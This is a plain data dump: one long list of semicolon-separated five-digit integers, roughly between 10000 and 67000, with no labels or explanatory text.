43555;31704;14983;48734;45521;62606;50893;39786;13436;43268;55120;65396;44691;31957;47645;45278;49662;12680;65088;59544;63561;17767;40933;53422;24601;48663;13736;43695;29629;34122;65933;55511;19711;65533;51084;61765;28737;11227;34823;44681;57360;30829;10614;65767;61444;49604;14844;19756;20209;49606;33382;24635;49129;14257;49885;21544;23710;20410;37775;14979;38805;33122;24143;22461;51316;20361;16751;18005;28490;13716;34387;63184;32336;62975;52298;26986;13852;29765;49834;52134;34867;58058;52806;24244;24041;47031;52374;34371;61868;37591;11332;16483;66250;10752;39859;17580;10554;66488;58411;31886;53852;64268;39156;58376;53946;19332;12991;22823;16725;20964;49068;65697;34210;39123;48564;17089;59023;44584;10627;35631;64224;17331;55412;24060;33244;37267;31979;23329;28198;36042;59017;30690;48845;55103;39661;38147;52475;61367;31033;51945;39438;54016;48794;62268;57957;22575;12360;10322;18403;44741;37788;44821;58619;41895;47539;63436;13262;58806;41264;15338;47836;28702;51476;58873;20244;20809;13004;12320;63254;54254;30726;22395;58733;57778;61616;44251;18682;21623;35100;25783;43516;44838;22102;38613;57265;39566;23787;53723;26958;28072;64035;50994;16729;43967;35257;20971;33484;24274;45213;55704;32184;29031;64686;55883;52123;25421;36331;30943;61394;66290;11803;36997;23137;52857;10687;49095;47685;28489;38262;60048;37709;60254;33474;40255;19135;53169;16328;16574;12550;32958;15707;31879;62258;39096;16508;16482;55890;22390;45619;45972;58295;47247;29627;15422;14015;26998;49575;42927;17839;61014;66455;63044;40463;46060;46000;22027;41040;62638;15560;39414;18807;24482;15034;55039;28330;46257;59386;61204;64824;10109;30973;22321;33828;17064;19818;36473;26380;17523;45055;52670;46219;60352;33705;21953;14510;29345;41825;49835;43784;15801;59912;33541;33823;43735;38109;56784;20834;45378;48666;28302;64884;45131;32961;54173;39685;60833;22517;35944;26714;25773;32072;58565;20314;12565;62700;64769;48339;45008;45578;64167;14194;27041;66626;65967;19839;45153;65963;44352;25075;58639;45212;13293;19125;54069;63134;54221;13874;26261;40754;62125;41567;62325;43800;57698;23835;46037;32012;31142;12740;32762;40242;17130;49523;17521;27298;26945;16218;12880;37650;34359;65521;62488;39539;60173;50845;46820;49717;17001;34267;59941;26382;15343;14485;41658;24512;29924;65471;19905;41580;65917;15697;47218;39318;22753;42938;54368;63233;21364;16296;35488;59641;64282;29653;21628;54212;61975;15922;65742;23132;12568;23295;27538;33639;15113;22365;24973;20234;21913;55189;19247;32455;50600;53980;37458;57131;60936;58587;21704;11339;25431;65185;41408;50551;31648;30424;38785;48308;61886;38250;25681;35422;55215;62524;13904;56869;34249;28931;41023;66610;38554;45591;25334;63423;28294;31015;40438;28069;34392;48908;65464;21446;58344;16731;17252;60588;28636;61298;17347;60777;39578;13154;66764;59457;17416;63252;60292;65143;54558;50192;38013;23022;44209;16616;40930;11864;25544;60296;47213;25577;43953;47073;13553;31207;19811;24817;62038;41003;47292;44317;29452;19291;60159;57035;54516;49022;34942;24068;28597;56355;65827;24748;42643;52177;26659;61834;21174;53101;27616;18992;46417;17724;39529;33432;49544;27696;40937;39305;27636;47832;52096;61184;44061;22527;47782;53940;47428;13198;39471;20995;30858;38178;66502;61378;28452;57845;51592;27354;50980;48531;34288;32623;58207;34994;39185;43351;35842;55089;33624;64772;64791;51755;22660;10044;41309;57158;59055;16691;29464;52012;65598;39469;52098;53947;28952;59697;50857;43168;34440;58549;34463;19093;12114;29928;21601;50769;33181;12819;31721;14626;41329;35780;15167;18902;59842;10170;47498;24341;10383;65741;61690;41684;54911;51779;54573;35443;41344;53750;64905;58170;27258;41925;42571;35971;35085;61962;44198;35046;37308;15329;36438;64322;54934;57002;30643;51016;21038;21892;44139;30256;60815;15624;42211;45765;65070;21506;52643;48522;49416;11304;17544;11907;56433;34810;12098;23466;21390;32774;40030;24995;24980;16072;39288;22135;50097;39932;58298;41047;62350;32825;58223;60110;19105;15695;56802;22518;20143;16761;55162;57455;38488;12511;53791;54774;38961;61655;33785;13489;49612;12491;13223;44327;11856;53969;14080;13614;50725;51735;30912;57614;14499;46173;46733;58555;16770;28997;42346;52605;43585;28980;35961;46660;64276;16878;50764;22465;47835;22550;66609;57375;23361;65887;55474;47882;11981;12096;45741;19194;13628;59836;27317;51386;54276;22549;26985;22626;22231;50202;39148;42093;13088;18703;37576;44171;40843;33556;41383;25729;59742;10501;51270;64372;48768;26722;57030;41999;14625;53356;37837;57732;39869;59115;41645;34399;58407;45163;20786;34541;36946;39440;30195;21363;22427;59094;64134;11346;55758;52270;66136;27881;63104;52755;43458;29380;49688;15336;30747;27953;45176;16412;54716;56834;28079;55168;33314;56504;60279;65854;50871;32682;39649;60143;37579;62995;49932;49602;13493;25565;50063;30344;52304;33787;63753;31508;56426;53481;61798;27060;16358;33488;39674;39437;45207;20124;54808;15500;27130;62007;33119;58981;57897;30362;53057;48498;16310;14427;35997;44109;42321;63986;60725;39046;48901;43902;18016;23543;61950;27387;16258;43744;40075;35603;35869;57885;66478;41662;56965;13170;57962;54593;18607;36846;31486;56475;43501;21729;53933;27647;23279;14889;66211;26204;37124;61279;56764;48316;24048;19548;66006;10329;53959;62137;57048;39324;34298;23976;60984;51149;49090;46980;31341;56046;27751;27227;51477;42099;10561;14885;20254;22364;42883;43942;43661;22467;29883;52207;42575;58864;40097;48333;17067;46895;24081;36588;34894;12757;22915;22063;30104;11997;18803;44356;58025;14671;36454;49136;37148;14457;45190;39712;13792;20666;55210;29567;41605;12038;51244;34091;45499;33470;47657;53083;34739;11293;13966;38246;22883;46741;60335;16650;20427;61820;22387;43346;44500;43760;39888;66768;15449;36998;18339;39449;38300;44415;11399;53313;33827;10927;26148;17235;36393;28205;11976;10551;45930;38793;43633;53551;12008;64952;54822;13347;46169;44613;37249;22001;28371;51283;40976;33386;61188;65303;62719;20031;43500;13407;13843;39377;15426;38259;26630;25674;62496;19503;26968;30964;65563;16581;28086;15689;15077;10085;46759;62758;15983;16510;56306;10451;13214;63859;15585;11771;40588;52360;40489;65265;33151;44253;31754;63864;52229;40392;54983;59355;54434;51223;12236;13184;19706;46958;46516;23450;26623;43733;12025;34749;54311;23267;62264;10543;15155;30467;66688;29319;53091;37312;52683;15254;53971;19621;36812;56423;19298;35418;24075;16758;63229;43050;38875;11424;29545;37916;42567;35622;18783;20640;56335;25691;45152;49620;18828;30067;47424;63752;13589;64016;37212;62686;51646;51982;35179;48873;60324;36220;33048;18922;25059;45323;28129;11861;63194;58525;32118;33421;26619;25308;18779;57355;66378;39443;12051;19170;39428;55706;25114;38180;26484;32886;23959;44013;65820;52024;61984;63477;16171;15026;41804;44833;28466;40118;52505;63305;62027;59594;15091;23400;10685;10513;65553;44660;38862;24473;17732;47781;19926;54947;54746;18881;31399;22647;28916;11253;26428;11839;50829;21378;17830;61693;55916;15242;51335;24357;64385;61305;24459;41514;48989;52737;46329;40049;11683;41621;41585;40786;25752;17534;27548;55830;38218;49344;49468;60174;41250;56876;35160;51389;12745;52664;58735;60180;20778;48704;13851;26833;12758;25838;62334;20042;54811;11170;62236;46435;53699;11095;34077;37177;14067;11042;54510;40197;13622;55705;54046;54440;62947;61760;55020;44069;55128;43437;54960;63097;42810;25252;35611;62097;19166;10650;36591;20625;32836;55395;60224;17281;15561;54552;32979;54661;13938;62130;29122;15994;36448;59162;61462;55742;51252;45128;30422;21153;29980;40736;16259;46680;32803;31503;56023;17246;53614;38334;22680;54775;42647;22599;29174;21225;34161;54877;50137;59118;42248;39670;49664;20395;43659;38704;55601;41928;14685;61804;53744;35899;52531;39052;41282;37233;66303;54435;33709;61669;20242;18407;22396;50145;50939;42130;50911;18579;54609;51865;26525;48282;42667;31981;14364;43369;57872;23374;30223;20506;15463;54505;27429;44562;53678;30439;39545;63633;27042;62603;49762;19152;18463;14597;63296;61930;40393;45078;60188;64250;54220;42240;45786;36152;33392;19120;33520;56655;52898;53485;59773;52740;63484;36901;26865;48885;34468;32058;49582;64762;40653;62291;34094;31123;45277;20295;32436;58105;30330;65811;34183;66807;61056;60732;57565;15207;60521;43390;20137;21770;10289;54326;13608;57436;31348;45665;59990;47078;47609;60303;29228;29826;23216;24408;24553;48446;22448;60011;15018;33478;52391;11128;33394;12700;54224;39951;45185;30883;40096;26071;36789;21304;18476;28967;24243;43423;63166;36852;52413;62850;61842;47900;34605;20091;46250;37119;56180;39225;48358;25549;25187;27543;11728;47636;21449;17970;23780;43505;29324;15531;21360;39825;10906;43230;27970;51649;28573;22613;66519;34279;24039;59911;45568;13899;52135;39217;63638;57119;41886;25641;36365;58522;36115;26761;11432;29825;23008;57583;23342;22333;23545;16552;64642;19406;16774;46246;26134;16104;40893;65284;11775;31040;53181;16660;37029;33330;11351;23553;60226;47084;44178;18794;57825;58320;36264;31646;28516;24388;20233;23883;50454;18882;26745;39307;17002;40561;55655;66887;22687;53318;59781;31884;16293;20421;39609;30734;33334;15080;39850;15383;40036;21158;12962;41235;27045;12294;19394;54776;66881;53237;33712;25979;47528;52433;44157;55590;32815;45990;51025;58494;64373;36561;28412;20968;45061;54310;60494;26043;25642;50414;30255;28107;25311;14987;18599;16438;32154;35866;33275;56542;29202;58296;51716;19284;19251;49669;24573;33117;53889;63002;48176;41259;33649;53684;32198;38879;37980;64562;35969;42966;49159;20228;17579;32586;40969;45513;18886;45414;16428;13059;24786;62299;23173;56115;56029;39154;37444;44994;24302;27305;41649;12475;31945;18080;51651;23176;24649;15125;52687;66601;60507;58285;33019;64072;43705;61130;61695;20495;15577;34608;26688;23487;28497;14026;36742;20192;38954;30684;55205;29839;58289;62745;56816;41777;52221;55348;11335;44351;57734;56035;25615;25511;27998;19688;55156;64122;33532;56586;28518;18471;24739;41518;32423;54010;27113;66769;46598;15836;21800;36810;54458;63735;20344;19032;26706;64349;43089;32889;64710;50005;12512;17036;50478;42121;45181;34836;23770;19504;30041;49659;25211;24855;33157;12968;65633;46069;27774;20894;39667;27360;34040;62911;32310;66040;28528;47026;41733;36960;49853;31044;58691;29718;61489;54217;23634;41730;38279;46393;24488;24607;41719;15767;44871;58557;22597;38927;24176;37160;29151;27372;53390;19104;58388;34369;66528;22280;27444;11092;12495;41193;33995;23645;25952;62090;49385;41738;21309;55332;20760;21034;43185;29636;38051;63952;33953;54414;23303;17815;19179;20907;26909;50776;45902;11027;21769;17553;51585;46275;36767;19910;29351;39984;22444;64031;35200;40935;55579;22533;31249;16911;34568;60162;51121;39162;10113;66330;37828;14433;22103;31356;59927;44057;29805;34630;44658;46761;64293;59479;34084;19658;59796;36488;57527;51030;61402;44926;23887;32526;44599;16092;53690;48575;25956;46530;55884;38146;47042;37017;57503;42703;45746;64486;43481;40593;62562;50737;39717;13131;23739;36124;34877;13005;13350;46367;15347;43935;65619;29494;24576;39411;14228;10972;43034;10023;15305;27202;24136;47484;29474;41110;62544;47590;54247;19482;49724;21020;38714;34859;17273;62484;41010;20457;44129;18954;56605;23248;63732;25492;27855;29892;26260;46836;17316;13000;66510;22552;10659;43649;39103;51094;51169;35140;64693;18264;56819;12519;38467;20225;43956;58012;55027;16643;43930;29495;49275;17104;35398;46314;29798;56032;56437;46038;27207;33751;37525;43334;60256;55743;56718;58413;60474;52203;35000;15843;28374;60858;17643;63719;45307;47614;49600;13670;12593;58420;65755;15833;64401;11228;36259;10948;39222;26461;40128;49084;30179;15641;55318;32121;44125;64528;37275;24031;39644;45391;10181;55392;20123;18735;30397;56612;52855;64896;29155;21520;26840;32653;19680;12931;49935;45173;52416;34873;40684;45098;13777;39280;36232;30451;46396;36980;28197;28624;38900;55629;46948;47092;41938;13148;30100;21784;49944;57396;18367;42112;42587;42179;31681;59523;38481;10512;39755;32001;52350;44912;54334;17039;31497;26016;12448;15354;17149;51917;66826;57823;28752;27690;20906;15860;57750;46801;61498;55701;27562;25159;22593;50836;63762;47098;46736;31563;24429;57882;35258;42338;38638;47666;11564;45744;66627;46974;19344;26826;60877;47891;55635;55939;48630;24071;65838;22749;51188;12036;62912;32760;22230;25166;64382;51336;26327;35782;38918;24958;54365;23414;15642;65708;18309;19341;23270;46398;39139;24850;10700;54073;16670;14703;29506;34738;13077;29563;57458;55098;22329;58444;31593;38041;37231;44757;54235;27036;65475;23949;56286;23092;58373;42208;44667;11048;35184;34451;51988;52775;66548;34971;61645;11843;51210;19033;41827;32233;48888;55669;30501;46889;61862;10121;33948;21028;13328;54249;41496;19496;31606;35150;59157;63080;55130;66780;39301;61192;35717;52308;33954;17063;41201;58578;44006;50004;45013;42809;38330;36377;53905;50915;64632;30534;15605;45360;41167;46979;54169;32779;42609;26452;33140;30444;10558;38592;21077;41837;47479;19316;27622;55141;60713;43511;56577;53821;19144;59152;33266;51469;41773;32637;65281;39458;38689;45211;15614;51803;53358;14117;22571;50982;40622;64618;56678;35403;18727;48546;33426;47611;39791;24561;43137;12949;11927;51665;17825;23569;57146;66415;53193;61740;11934;29335;64495;31934;37257;53597;22338;46025;53347;37285;45157;42870;38828;19882;17203;43492;30254;25290;46142;26592;23063;53046;22756;36744;36237;10709;31059;59726;38615;22643;39591;31380;26154;25819;26432;24916;31202;61363;45372;33102;24735;51431;10781;48432;48766;60571;11859;10103;52638;39733;36420;58982;27614;33547;27388;65743;33189;41121;17515;37511;55476;18327;21885;13879;37660;50068;63635;44381;26424;54021;61900;38894;24538;60332;40098;11220;41918;42244;15013;41403;42442;23946;38924;48377;36168;30087;61434;39248;25474;56694;36223;48346;51174;55252;40272;59695;64162;10094;60345;54542;36452;36609;59477;33101;65576;56380;53206;36424;62293;39723;19320;22224;49581;22556;30271;51623;21483;47468;60802;55893;52692;25080;45283;27919;64861;20962;36382;12779;34571;49215;36384;54837;47522;26977;18500;18371;66165;20318;65547;49818;58623;19567;34033;61185;15626;18172;24400;43302;57424;19161;13479;45268;41686;20080;66047;38594;63707;33277;50175;53491;39016;40107;31853;49093;43703;36418;16413;62626;27006;25853;53511;25090;18616;66746;51445;33943;11697;19995;27307;44671;28465;51998;41370;46168;34397;60479;38558;22192;57042;17375;40088;62939;49340;17367;15376;64055;45435;51296;63656;53218;50547;16805;54781;65900;34998;20681;41211;14322;48690;16563;42561;56737;22279;16744;31169;65429;14646;20426;50793;42320;20317;25630;19932;58602;47033;62862;49863;33748;26618;14715;66402;12253;26340;22114;64955;25833;49012;22646;44366;36150;15612;36803;29391;42092;31959;62050;17511;52394;62011;57757;16411;39188;58883;32302;51021;26988;32111;45494;16610;62928;17218;25249;41472;27100;45470;32911;48823;14849;64623;17471;35847;40357;42569;15492;54763;66447;44041;28065;37542;55684;46266;35536;32994;38693;36167;22018;23169;38112;60452;17659;21625;27948;46378;27530;66931;56192;35425;64302;15136;19614;38930;59699;11751;37320;32731;27718;19071;23434;60419;30791;19436;46870;65172;34624;49028;51262;43387;57394;28856;65951;19370;27754;61536;17794;31637;36045;32833;13764;24236;21973;64484;45656;65616;10302;36159;38182;31675;31564;60222;12306;15118;31071;28034;19253;34586;52598;62388;57902;18274;16330;25504;58037;41358;44416;11222;66916;13685;19188;59771;49140;46209;56665;42568;56294;30600;44758;43032;63056;41043;30242;14037;26269;11725;24245;23845;42386;36361;58711;22271;41959;14197;36958;31676;32712;32087;27055;50019;58512;35939;20863;35047;21340;10127;62865;50517;61770;52084;50085;10148;53140;28458;38974;54497;45777;30613;62061;64597;14759;43817;50708;18004;64408;36821;52568;48986;66544;22734;35650;22955;13858;13520;10536;39958;59972;20265;40914;45290;12939;31657;50363;16366;21116;19724;19873;37331;24329;42804;32182;66128;66493;51554;11631;60104;62881;65308;23044;42227;32798;63399;59255;33491;10401;14792;37621;46400;65205;40399;32767;11028;32496;39662;54927;19662;31079;54845;63525;17427;36157;59597;64023;17212;22890;31622;27327;52896;14765;23090;60432;43184;20958;19259;37466;36625;32266;33704;23193;60037;59837;24480;10274;45265;44407;33626;17811;49658;49257;42243;47283;29764;37584;42025;52294;58088;37505;36923;39533;11845;50197;52317;10905;26597;51236;56377;28441;65173;47594;31280;63949;16954;43049;30928;25280;22513;66795;50238;54568;43813;22572;53513;45790;51911;15447;56661;46936;61766;50987;31712;45068;26243;29501;58660;51888;26299;27531;19575;65679;33144;65166;53536;35040;55760;32752;47086;52170;66337;40303;43461;38718;24469;34529;58303;42389;48453;28231;11505;65027;41491;19803;23214;65735;23744;50489;20943;65798;31023;17214;51776;66425;45481;28747;63397;56511;27612;34550;62595;31477;21203;65130;13856;23740;62861;53037;20873;11760;30823;17485;17060;52652;10045;47312;19350;34527;50448;21276;55674;65229;62030;62667;63463;63779;40981;17215;59350;27771;21111;61265;40266;58403;61800;31674;43769;28416;28405;36640;62098;54969;37368;13073;46499;34422;13840;39157;36472;61942;56982;36887;18849;30180;29150;14348;14612;10298;64364;45880;17043;46520;45120;21833;52860;10967;32721;30376;47603;20596;12429;37827;28350;33763;34078;35868;44549;60566;38586;43453;47872;13151;13999;52429;34395;32011;62668;52847;24097;20131;52818;38460;45620;20214;32278;54322;26729;49864;38633;53736;37480;36530;18252;57332;19380;16162;61905;33046;59036;16760;28031;27105;23014;43756;25128;63947;62493;26344;11897;66353;32855;30088;59095;38684;54656;19792;39931;59642;30801;28141;44882;15450;39671;44322;51203;11069;10692;12507;53174;54141;26514;45425;28379;12934;58179;59285;64511;51914;40131;51832;52595;23119;24073;34144;43920;11498;53636;36685;41083;40169;32977;45225;37452;59167;40773;46838;47578;23017;66685;59628;63437;28064;30221;31271;24857;59087;38570;51125;27666;39760;65403;51591;56488;58224;34443;47189;52226;14722;63241;60940;11336;47261;32893;20366;59904;61120;15604;23863;29885;23653;46345;13361;54391;18668;59632;42471;29288;60617;25785;57667;33241;41175;51104;43349;39713;56328;49332;43890;49483;58032;37070;21190;28723;37854;52351;27861;30680;64629;54178;25733;21350;44756;64193;31113;37075;30097;14120;42000;33425;36843;31165;13275;29046;26026;27918;41877;57311;52866;55784;22343;18968;15252;52476;38907;61353;40698;39965;57414;45111;63795;51227;13996;39228;63936;26496;53171;17788;59627;34684;26749;47577;48471;27917;46268;36540;43856;14193;62229;66779;64221;57164;25812;50132;12786;47109;17259;35528;57648;63173;24240;63645;37868;11972;58307;50199;34093;30806;65621;38234;41756;58047;10517;37040;21132;47361;37225;12645;56087;62609;46694;15619;43175;21634;39930;25850;26363;30189;12957;34131;52121;61839;39198;35151;47878;50758;38265;58308;12846;27942;60261;21658;16065;19474;64061;23962;64552;18067;27435;16207;27971;34348;66263;65878;19224;18955;32573;58697;27520;26166;33083;48568;52584;29130;62370;23594;48567;11974;44047;41624;52007;18742;44888;13042;16316;37199;40275;35705;56393;27191;18757;40313;53265;26843;56637;13425;57576;34730;13924;29004;16683;50504;59117;47725;27639;47709;28019;28148;12634;45581;24478;37213;49393;19140;33974;64380;62028;27294;40694;42168;40318;42077;13916;24808;66219;23743;64441;42188;30868;56548;27985;13883;50126;26935;60053;52863;60789;56960;52470;60506;48586;32107;13514;61041;61132;54438;55426;24407;15278;22621;28886;43879;24764;26315;18285;47356;47104;43160;33158;41803;19117;13257;20604;54797;26978;10637;33393;16694;23500;26240;19435;18199;42881;34878;17011;23321;15032;16399;53403;37067;30135;21681;24564;54208;34433;52911;51412;15297;24745;23503;50773;10214;63123;16351;44723;27864;49744;59533;20721;46175;53728;20147;32875;23258;23002;11032;44263;51742;12702;47730;53595;40308;24141;53973;29952;16060;23682;14483;55072;11287;13009;46186;65117;55375;63685;10047;18113;28386;19353;18355;13255;55290;63637;14293;53070;59404;53345;45267;13571;55780;50364;41481;56716;44883;46981;11896;48408;21806;38029;49345;28972;10016;63494;17826;51905;18177;17308;10593;65705;32606;65490;34750;46764;49928;66872;24543;56367;56582;35365;39145;66238;10079;50334;43830;16520;55303;24505;43008;33585;64418;42182;62900;53160;24311;12834;16445;10436;24306;59395;39829;26661;37603;22008;53478;27950;46311;32748;55717;23599;62708;62720;54413;13779;54580;38328;12488;65188;24915;40987;30694;43074;21031;15580;19122;63632;25299;64904;20251;59553;52853;53804;19295;57807;52604;56618;58399;17180;53165;38721;57472;43928;39450;53419;44401;47115;47571;27872;64956;38516;61280;41578;49868;41538;29125;44764;66666;25892;36092;33992;31516;59265;22843;23418;57215;26110;54087;35680;62753;52937;41512;18974;31528;52532;32636;21085;20770;44486;47135;40824;46158;19206;18550;47643;53267;21921;54865;28011;61794;33854;52957;53898;45101;61727;49856;43889;32046;60969;52130;30191;10510;65034;65731;46525;26746;50933;21124;15802;34372;20535;60780;52031;23478;19864;53629;57976;58437;27735;59474;18933;19582;34565;51326;15588;10117;22109;63902;58894;41202;48511;59346;16376;18014;35433;29647;34804;27719;35584;19384;47721;52083;30794;37266;17780;57496;31900;45796;57851;49481;40669;39915;57542;40326;39284;54769;63810;21183;47504;22547;64443;63906;46297;32789;60328;19993;43257;20705;48563;38565;37735;45168;20007;14007;54127;43077;35499;60470;41004;58505;40654;30299;21180;31548;24532;34282;35322;29246;22918;11618;15275;54246;19808;53564;56905;61940;35698;36815;56107;29234;54392;49846;54511;64530;44942;52557;29214;38470;16112;42173;53415;15603;36905;52266;55436;35299;10440;58122;22433;28946;64619;12982;15130;66413;49364;47370;36038;57430;34485;56671;55793;46204;31651;58893;42269;62914;60738;66724;59667;32560;39746;56142;42902;11411;33186;30319;23335;53368;42693;18583;39258;60605;18349;53619;16994;26114;23671;22786;51564;62317;16286;56446;51804;44400;22589;55456;29677;58542;36060;66557;63990;37927;58988;28297;35111;18250;56468;52043;29544;38366;33354;44449;21991;16529;30341;65897;17254;44951;15035;55747;24502;61207;41907;21982;25525;11120;22875;23362;12324;45870;39845;62442;50736;61551;21414;55463;21546;56041;60498;43318;37051;60909;25814;33303;59450;51345;61726;32242;43488;11796;36502;47547;49271;58666;43467;46651;15759;66962;11165;17829;12653;14818;55708;31154;50104;25144;25490;34119;60676;25044;59961;60422;60480;49432;39922;55116;30413;15108;12516;58227;30046;47497;32800;25941;66215;17410;51940;19303;38221;44669;47619;26528;66210;39923;23535;24281;38015;42986;55604;41422;23684;20810;42189;16680;62129;19930;51928;66514;32638;33159;27226;48917;50349;43648;50445;59768;66967;49870;29386;25174;33777;22971;65986;16904;37380;32524;21968;50008;25950;65449;43854;39396;23907;58836;60990;64910;56280;27580;31510;24729;63589;26598;51290;59397;49360;20926;26625;41660;59538;62522;36203;64572;26696;12361;13539;28858;45698;62979;58754;18867;35248;57239;63181;25849;51166;61247;27830;17371;33701;31377;44559;12650;49633;16127;28938;50100;26167;58134;57376;41762;34447;52211;48454;22457;33466;15686;19645;45476;37414;43128;11722;59783;36227;54346;37201;60683;26596;52437;58612;24926;50219;10705;38441;21326;64404;25304;30625;28942;24180;44930;40660;19010;61694;66711;57159;47720;42595;29777;13921;50583;26462;64312;59542;27208;53754;46973;63592;27821;46021;32790;38410;22104;21432;26891;40365;46984;39094;10198;19907;60661;42879;50302;11928;30596;49474;26495;45422;29664;27238;26048;58372;44800;19162;46478;58113;19138;62155;29657;12672;32324;52654;23998;49913;48363;25163;51238;38181;57295;28283;11207;46115;57636;50670;32919;33472;50209;64105;58847;44881;33370;22841;41535;29161;32234;36661;44266;37310;25740;13219;41247;13496;41597;41035;25519;43559;14912;14469;39365;60007;26712;52000;19183;14709;39558;64868;12845;36836;66142;31410;14664;25711;51995;22787;46286;52950;44931;59352;11867;21975;39501;39418;55687;48298;56830;11203;13564;30028;66390;64839;44694;44200;65678;34100;30347;31532;54887;42256;33365;51017;26441;55718;36611;24064;28114;43430;56230;47410;20524;56540;35627;16788;62210;37117;32062;27486;57857;41327;39272;59659;34790;36156;26493;55766;13576;61428;52963;49556;55443;22090;59310;57056;61036;28010;39323;38031;60591;22524;45050;47827;21635;25404;26803;66467;20826;50698;61222;52334;42223;13349;59431;51276;63625;40334;35194;52465;31579;66723;36756;50249;35146;63603;16005;22416;61859;34801;25546;43876;37911;28209;34926;10484;55937;15106;33573;57354;52102;36210;41875;51418;16489;46252;47778;46383;16198;26467;44088;45054;22904;35298;36546;53957;46552;24364;29362;22016;29624;38036;30110;59064;61952;53033;36462;48848;14157;44333;46553;40281;40690;34366;48662;34910;54075;45016;27535;25386;54644;14756;32434;29339;54652;27116;13772;62757;27936;59522;60360;24072;35809;61736;35172;35032;53496;18669;66034;37917;37693;46692;55247;40319;59818;32380;22351;36795;44025;53466;55472;33177;15342;62513;42178;28665;57369;10245;21977;49576;41775;62144;42853;22632;21249;20363;23441;51185;16031;18003;33358;31077;63454;56407;41492;48603;54020;11627;12401;28051;50000;30296;53023;44276;11386;41427;35634;33942;44753;66755;26901;35814;27328;41142;11791;29916;13034;51881;50846;65641;13878;54054;11809;17049;23427;40112;37995;25189;61486;65950;37321;51970;28780;34853;13800;43103;50331;12699;25676;42829;33957;33263;28409;56016;23106;29419;65932;25058;59270;65640;50841;41320;29875;46456;15881;49303;64116;64819;13402;54255;15484;21588;51577;25149;51489;44746;36435;16882;21380;13867;58986;62467;55567;52179;40389;28443;11385;18762;65360;54425;37681;13499;10579;18749;61937;57470;27926;52523;41523;53709;26431;46599;66088;49988;18753;41776;40089;63418;26543;48559;54658;50900;33050;20583;43376;62880;51619;20779;14971;55289;30838;13220;64695;26179;41058;44498;26580;18414;32070;28560;28144;41375;19715;34680;36940;50213;48295;11513;31491;18311;33035;28407;19307;61779;63357;38691;13104;26897;14434;34811;43352;13437;61070;26294;47415;11394;59540;27512;66003;15480;64218;17414;52085;31293;19759;55947;39541;57835;35704;39107;26645;14016;51429;47766;18341;61600;56758;10456;27414;22372;39350;47512;66102;20555;41066;18446;39966;21697;64734;39316;60278;44983;50306;29478;25487;32699;30688;64725;37615;60093;50700;46511;58076;50024;51859;47016;21403;19633;36325;62545;21498;28679;61091;24795;23265;60265;51600;22811;35759;34795;15740;33175;51740;53871;14079;43896;57967;62287;49568;19652;15618;46827;60954;43294;50581;61500;58908;14882;66572;51683;64788;46319;49663;37586;32064;19100;45573;12364;65252;61182;38692;31719;31389;34202;34611;49379;63857;43892;52822;33889;31710;12534;31144;55234;50828;41222;32954;18528;31413;57607;19605;54286;60310;42397;42235;61595;13956;25775;45121;64176;55358;39402;41901;64525;33653;34296;36005;59791;45753;43869;64825;33529;50441;27635;14512;46036;28219;29998;66966;34114;29948;33410;55805;53764;50393;58530;41318;49874;13678;47816;39953;37981;43811;12723;30024;45398;65716;48373;34349;55787;21088;58358;39184;16467;58651;40633;58350;16558;11136;57779;10902;35127;22957;60113;56153;53537;19709;36266;55029;34941;33760;12031;60989;60757;24546;32314;20073;22960;64258;45183;10516;66553;40729;21475;29548;33989;10433;10293;20671;48359;25453;18903;42740;64119;58182;18159;34004;15628;42605;57259;52839;18945;52486;39209;54585;24918;40494;22504;12045;10766;45045;64033;31205;57201;64352;25581;28192;57751;40312;43023;58838;52278;59564;63907;14883;25698;62766;35824;35082;14843;41014;18302;23955;33567;39169;40177;26624;33225;21440;53215;34373;49198;19980;22162;27904;21231;26037;55173;61802;49107;18565;65076;48281;45632;10583;45332;20516;45816;43541;46307;49561;63003;31258;59113;20639;56170;43110;20231;12230;44832;38910;63694;22733;27576;62571;50652;22010;24752;48203;26034;35567;32086;38201;56769;31294;34604;49909;18622;51467;51232;29176;41164;44245;25215;63027;61210;46094;58683;35813;48805;52793;21396;65207;51481;43771;14319;43044;19902;54239;38581;57900;27237;30808;13463;47335;20700;50449;16580;42107;44727;33200;11919;40770;23067;10172;48169;40404;58528;18924;38577;54160;40120;45896;55434;14798;54306;14299;23241;53584;54223;63145;53363;31647;19998;41343;61366;65802;58294;45319;55896;32462;21950;64039;27286;38497;63997;36187;46537;26193;28695;24179;43451;56018;53307;19984;47724;49457;35501;29399;66709;18721;28708;62022;42684;28184;24193;65145;16632;19934;47223;34913;62034;53362;13746;18816;44090;20800;42844;57317;15528;63099;15404;35231;51341;48705;44836;42440;24690;33551;23698;25013;63620;32037;58713;43295;66955;46859;55596;54079;21524;57971;25688;32522;32538;22777;54833;40800;58154;38989;43355;38301;18921;46111;19573;29584;17175;39622;43298;24351;49264;31842;28832;28835;58092;23455;35863;13481;31650;50723;42890;42145;34848;13846;57033;59154;35743;15244;24403;42428;49613;20301;63383;27410;54876;23945;18767;41237;63549;16254;58583;62196;40627;27523;43934;52067;24821;63510;40382;63755;19089;57345;21369;33812;33417;21457;41055;17680;64225;49272;54227;24819;44353;18026;13563;62877;65191;44062;21422;31521;30402;32670;14997;27922;35335;56215;26187;63700;14372;25510;29850;27289;34959;62202;15458;58343;41280;61717;53777;60193;57325;62841;43068;29032;27218;60937;57168;54344;22881;36927;57437;61560;36184;44837;21237;65787;63309;17656;32030;30466;34830;48529;17814;50750;40621;18763;49254;50827;21792;40555;42847;20545;18832;22268;10052;35803;44818;19431;62270;52540;65803;43622;64357;14833;35470;51497;21568;26291;33209;65829;12659;62608;52786;14343;41381;14420;34837;11462;12297;41325;20087;66184;40011;47071;52125;52017;51435;66237;66418;50384;37949;21530;11329;37536;14395;52111;62381;62044;52674;16718;46729;11300;43422;26095;52153;62185;58070;57664;18746;20679;20519;33976;15750;56451;39959;12392;65305;28058;32078;19107;33449;31520;44650;66690;37605;55564;29923;37024;31612;25905;33848;33750;10982;41098;27540;44001;15139;46753;36884;39639;23736;61579;21766;39917;60973;52606;15180;40093;53756;44639;36859;47513;33143;23377;34610;43061;63966;42127;30298;18064;57716;38641;40202;42063;27491;45024;10690;11187;63785;22112;23128;41084;22477;20095;46240;18297;37279;44947;33420;44608;15031;45302;35369;29857;13850;34360;49417;54717;21715;61960;10983;42176;10405;54347;32115;16829;41081;63802;54126;51926;40034;37334;11601;17806;11045;59239;64833;22382;51960;46999;31662;43757;25321;42554;40918;56815;49861;24605;63009;47849;64958;36068;10321;44058;58507;14618;39623;32149;13605;27841;13611;13964;35188;60373;51430;25777;63529;62847;26925;36632;64040;10944;48786;49968;53935;46075;46167;63074;14623;38378;31631;25780;51718;66740;49686;28914;14858;24235;66037;13886;20324;34798;